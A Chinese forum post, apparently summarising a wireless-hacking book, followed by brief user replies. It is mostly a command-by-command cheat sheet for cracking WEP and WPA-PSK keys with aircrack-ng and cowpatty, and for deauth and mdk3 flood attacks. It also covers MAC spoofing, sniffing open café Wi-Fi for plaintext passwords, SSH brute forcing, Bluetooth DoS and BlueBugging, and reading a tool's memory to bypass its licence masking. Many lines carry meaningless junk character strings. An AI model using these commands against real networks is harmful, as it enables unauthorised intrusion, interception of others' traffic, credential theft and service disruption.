《无线黑客傻瓜书》读后总结

wrczeus

这本书看了一个星期，终于看完了，现把书上的精华总结成如下内容，条理化知识点。
! f  S* m* C- O, J& L+ S( ]! b  Z
以下所有操作均在BackTrack 4中进行。

5 Q: b& {' b6 P8 x
无线WEP加密P解：

$ H* q; B0 i& {0 a' k2 ~% t注入P解：

# o/ k( y5 c' S3 {" t# Xifconfig
/ c3 l$ h  r$ D2 e
; z& l. d! V% Z; z; Mifconfig –a

ifconfig wlan0(无线网卡) up

2 s9 m# ]) \) C; ?4 sairmon-ng start wlan0

airodump-ng mon0
6 F6 Q, k7 O) D! k6 |
airodump-ng --ivs –w ivsfile –c 频道 mon0或

airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0

# O1 Y) z, U1 b1 I" s8 E3 Yaireplay-ng -3 –b BSSID –h Station mon0

- i# \5 m7 R+ V, J) S8 _5 ^aircrack-ng ivsfile-01.ivs

虚连接P解（适用于无客户端连接APP解）
+ P8 W% d4 J) o6 q. T
* o( T* [  G: A0 A( z; [, O: Fifconfig
- F0 J! M7 c3 C% m; B* v; I# I  m
ifconfig –a
; k: `2 i0 J# ?" P) p
+ K1 I' i* n# L4 o8 C6 q  cifconfig wlan0(无线网卡) up

' m0 A, C+ p( r5 W, M. Sairmon-ng start wlan0
/ y8 }( y  S. F' `9 \  |: c
airodump-ng mon0

9 g% C9 e: M# d8 `6 T: Vairodump-ng --ivs –w ivsfile –c 频道 mon0或
, G1 a- F1 |- _2 ?1 H
! C3 p# K0 f. t  J: r& k  |airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0

! g8 k0 Z: Y0 E0 q5 e9 d, uaireplay-ng -1 0 –e SSID –a BSSID –c Station mon0
" j, p0 |  W) g, Q! h0 ^" B7 ~1 L. `  k
aireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0
' p+ A) H3 F* k5 _% l# M
" |! |- e* S! g2 K1 Eaircrack-ng ivsfile-01.ivs

/ T: \. t" G" c8 y
还有傻瓜式P解软件SpoonWEP2，SpoonWEP2中的Chopchop和Fragment来进行无客户端P解，P解时客户端MAC栏留空。
1 m, o. z' e8 p1 _
  a  }3 U3 i& ]) t
0 L$ P, W  b! {  m8 B9 g- r, JWPA-PSKP解

- R. v# Q9 E7 M9 x# K; |- Xifconfig

ifconfig –a

ifconfig wlan0(无线网卡) up
+ i8 U& B" B. h% c
airmon-ng start wlan0

airodump-ng mon0
) p3 o2 v0 d; K1 ?  d4 `
2 f$ S! ~4 W: gairodump-ng –w capfile –c 频道 mon0

aireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包

2 ~0 M; G8 t4 \. [2 O6 R/ n9 Faircrack-ng –w Dic capfile-01.cap或
! Z* P0 ?, d* N) S: N# E7 K
# E% K) p9 e3 z, R1 D, R- Zcowpatty –f Dic –r capfile-01.cap –s SSID

* A- h4 d# }! ncowpatty –d HashTable.Hash –r capfile-01.cap –s SSID

傻瓜式P解软件SpoonWPA。
2 z7 E- j; C9 c
, T5 }; A5 \) |2 R/ n: R! pBT4下自带的字典文件：/pentest/passwords/wordlists/darkc0de.lst
/ I/ Q- M- X  \- i( x/ n/ s+ Q) N
& _% T1 s: ]+ i* b6 U8 x) z
字典文件的生成和上传

+ ~3 j; \3 [$ F2 T2 K在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。


BT4下开启Tftp：Services—TFTPD—start TFTPD
$ v* j. {1 f- S! {# q1 E/ y8 L
在Windows的CMD中运行 tftp –i IP put **.dic


BT4下开启SSH：Services—SSH—start SSH
! F7 S' L! K- f7 ~6 u
! R* N, e1 E" ?* ]Windows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录，前提是设置、修改密码：passwd root

) m$ N* V; B# |; o9 F
AP限制MAC时的解决
+ {0 ]4 e3 r* p3 w9 k& A
当AP限制IP连接时，可以伪造为合法用户的MAC，关于AP连接的用户以及MAC，可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为：

ifconfig wlan0 hw ether NewMAC
- i, F2 Q3 n& D5 @$ L$ J
  k- J' }+ U" j& b) J  f2 R
关闭SSID广播的AP探测：
% h; u. q8 ~- g8 m0 j9 ~, \
+ d( ^, {/ |( D1.     Deauth攻击:

. m1 v( v. C+ {8 k$ Z9 H9 u6 Xairodump-ng mon0

  i) i  r' A  L! H6 [5 Paireplay-ng -0 10 –a BSSID –h Station mon0

3 W0 ]. z" ?( G) N9 |2.     抓包分析
. e# Y! [6 W! N5 W$ J" ]8 X
Omnipeek
" \' z' X; z1 A4 \
Tcpdump –n –e –vvv –i 网卡名
) U. u: S! d1 g% H# H: `6 O
3.     暴力P解
( O% P4 ~4 \, q* Q5 p) ?# ]2 v& i3 V
Charon 1.1暴力P解
" d9 G) k+ j1 b* q# R& I

无线加密数据包的解密

% G+ Y- P! y$ H$ }% m# U& v
使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ，使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
: @9 B  D: X5 n
FilterNS     DNS解析数据包
; I7 {; U6 U# N: I  F5 z; s
: O& ^( u" K& v0 h: ?7 h) l& mFilter:HTTP    WEB访问数据包
! A) S3 l- A+ L  f3 J- A8 R
4 F6 I1 E9 L, g0 U! }Filter:msnms   MSN
: l, z; p! c5 f
Ctrl+F查找pass可以寻找一些明文的密码，如论坛等使用非SSL连接的账号。

5 r" B* T" k5 K' y使用airdecap-ng解密：
' I1 C/ y9 e2 R
. H/ V8 ?$ [) V, Q( C; V, D! T/ DAirdecap-ng –b BSSID –e SSID –w 密码 ***.cap
2 J8 i' u6 O# A" x( F- y" M
7 C( F! z( u7 t5 ^5 p
咖啡馆中无线数据截取(开放式无加密AP)

* A/ z$ }* f* `! M3 e1.Airodump-ng –w data –c频道 mon0
) J5 m  c6 I8 }& M
" j# h' K/ }: I- f* K2.使用WireShark打开分析
( c1 B- Z+ P2 m1 Y
1 `. h9 e9 N& d2 j
BT4下的渗透工具：

nmap –sP IP/24        判断C段下存活的主机

nmap –vv –sS IP/24 –p Port    扫描指定端口是否开放

nmap –vv –sV IP –p port   指定端口的详细信息。。。
" ?+ T: P) }* H6 l! m" b5 Z! H
namp –O IP/24    判断主机的系统版本
0 ]& I/ q5 @, t& L7 g' L
7 |" E1 E& s- }/ u
) T, ]2 H0 M; s  Y2 j+ F+ P% n7 l6 LGUI 版nmap：Zenmap
/ T& x" s% I: m( @2 e
8 K( x2 C3 k) ?! t+ E" h
, Z  e% v5 Y* G  g6 u' nAmap使用：amap –B IP port
; \1 J1 `/ g$ T, p  l
5 \. ?! y# h, d9 INbtscan(扫描Windows网络NetBios信息)：

/ n1 q+ c+ o) t' anbtscan –v –s : IP/24

* y" X( a1 x* vnbtscan –r IP


8 |8 w7 ?: v; I5 B" G: G/ c& [DNSWalk(指定域名的DNS探测):./dnswalk XXX.com.
/ y8 f$ h2 d: G- j/ H# ^) y4 n% D$ u

) }7 d, A7 }: }0 m! C: zHydraP解工具（backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks）

BruteSSH: ./bruthe.py –h IP –u Username –d Dic

Metasploit3使用
无线D.0.S


% S& w. C1 O/ |; b- [% @8 [  O% MAuth Flood 攻击（Authentication Flood Attack，身份验证洪水攻击）

3 ~  V# g9 z2 A  ]airmon-ng start wlan0
- I) ^8 R; ?" O, Z# f7 b7 w
0 ]8 s' e  \  m$ ^airodump-ng mon0

7 V) Q- v1 U& C8 A; P0 w- p; |mdk3 mon0 a –a BSSID
, z: o& p' t6 P# E4 B3 d; L
对所有的AP攻击：mdk3 mon0 a


Deauth Flood 攻击

mdk3 mon0 d –c Channel

  g3 P1 r; J3 T8 j- C& |% e图形化D.O.S攻击：Charon
& f% N6 q1 _7 z# t- b( E9 Q

) I' t  [- I" ^# J当受到攻击时，使用Wireshark抓包可以看到异常信息。

) }2 h& Q$ c+ |2 v7 V
$ Q2 F6 H: I5 \8 @WPA-PSK高速P解

1.       WPA-PSK PMK Hash TablesP解

Cowpatty –d HashTable.hash –r ***.cap –s SSID

# V, ]* ?0 e) B: |. P: y2 J. ?Hash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
5 {* r5 ^% G0 k6 G7 j: [6 r4 e8 u
/ }& c. J& X* I! w/ O2.       GPU辅助高速P解
; n  U$ n( B  @: }; K0 D. s
使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解，未注册版P解后密码只显示2位，但是可以使用WinHex查看（ALT+F9）ewsa进程的内存，搜索 密码的前两位。就可以看到完整密码。

3.       分布式P解

# K; E) K  m2 ~/ B/ _4 h( L
AP的伪造

把AP的MAC改成目标AP的MAC

网卡软AP

6 a7 J9 z4 {. I: b1 [3 @0 g6 m
+ f/ v- R" l: v$ Q( S& e伪造大量虚假AP信号：

随机SSID：mdk3 mon0 b –g –c 频道
7 A  r. g' M: }. l, V* ]% H. U
指定SSID：mdk3 mon0 b –g –c 频道 –n SSID –s 速度
! S) d. ?: k- E% s0 D& q3 K1 `& C
: s% C3 P3 K' o3 s
, x, O1 V) ]* l: q' ?4 X5 ZWar-Driving

热点地图绘制
6 L4 v# x  F; T* @9 X% K
' O* j/ i$ t) G( {; Q' C" O" nWindows Mobile系统智能手机配合GPS模块，使用WIFifofum探测，把结果导出为kml(Google Earth可识别格式)，在Google Earth中打开即可完成热点地图绘制。


Netstumble

* @0 P  n% V  T* e$ ?
' @6 n3 n* k; C: L2 ?* U蓝牙Hacking

1 R3 @- D4 i% m; O/ Q: TWindows下的Blue Soleil工具
' e2 k* V2 X; r  T; b8 D# _+ A$ r  C
BT4：

0 B7 D  Z1 t, i8 F0 e" J) k: e) yhciconfig 查看蓝牙适配器
. p, ~  r7 p9 l- Q% ~  H
! W8 e7 K6 s( Nhciconfig hci0 up 载入蓝牙适配器
; \$ g8 S8 G3 Q$ J) D0 S/ D
hciconfig hci0 class 蓝牙适配器详细信息
- N  h& T( _+ G8 g( x9 h% V

hcitool（扫描蓝牙）

hcitool –i hci0 scan
7 D' \3 a; Q9 a# d& \2 q
9 Y2 O. i6 d. }7 S. r( G6 mBTscanner(扫描蓝牙)
) I; M6 P# o! K  _' [

& W$ o6 I) F5 U3 a) B( |5 p蓝牙攻击：
& i/ _/ m* X+ f% r8 z
BlueBugging (适用于BlueTooth V1.1的手机)
% F4 O) T& B9 L) z5 I! v
, j( h% g7 P" x- G; \3 tBluebugger工具：

Bulebugger –a HD_Addr info
6 y/ V" t* ~# d$ t  B
; u3 L! v* }' Y
BlueJacking
9 ]- P. }9 S0 I* l3 g9 _& _7 p
实现方法：使用手机伪造假的名片，里面写上消息内容然后发送。


& V; `( _; Q; v( S4 VHD_Addr修改：
1 D6 T: J; I4 D/ |! r
2 a: @" ^1 E! gBdaddr工具
# J4 ]6 [0 V3 F( I- b, f; e% a; ~
( A" _7 E* c% f" k: [6 x; G( ?3 Wbdaddr –i 蓝牙设备名 新HD_addr

+ Y; c9 [3 W( r) i) d6 o
蓝牙D.O.S
" D# U6 |; L7 |  b7 A5 Y/ ]4 a
l2ping工具(蓝牙连通性测试工具)，改变其发包数据包大小，使目标设备拒绝服务
  T: E0 V4 a( B6 |& t+ G9 r2 Q
hciconfig
, s0 X$ q0 y' _0 D
hciconfig hci0 up
1 B/ C6 y  q% z  o
hcitool –i hci0 scan

% B9 ]7 Z( K  E9 P. x8 O8 yl2ping –s 10000 –目标MAC


不可见状态的蓝牙通过RedFang暴力P解（暴力尝试所有的HD_Addr）（概念性的软件）

./fang –r ************-############ -s
. x6 }0 \4 {$ ^: x  B
暴力P解************-############的蓝牙设备
% M" X5 o* d& ^& Z
./fang –l 各厂商BD_Addr分配


WifiZoo使用

./wifizoo.py –c Capfile
8 e, m4 M. s* R! ?6 R
2 ^' q0 X$ L- s( m; y8 |- f访问127.0.0.1:8000即可登录Wifizoo管理页面，查看数据包分析的详情

tlwxs

传说中的沙发？

yuanbin0710

我还正在学习中，先收藏。

wo2rikku

总结的很好~谢谢分享

天鹅爸爸

分享成功的经验

yggdrasil2008

呵 ....正在努力学习当中....

donglianjun

Exellent digest

neglinhai

谢谢看了！

na2650945

谁有电子的。
& |9 c; E* u9 g2 @9 ]8 T" c6 A6 L借来看看。

applehdh

LS的 估计不可能的 会被管理员和谐的
呵呵 其实也不贵 21块 快递再一点
0 D  g2 g9 y: o8 a3 Y6 z0 W5 p我们也支持一下超级版主这么多年对我们的解答哈

实习魔法师

回复有理，顶贴无罪

tuilly

顶起~~~~~~~~~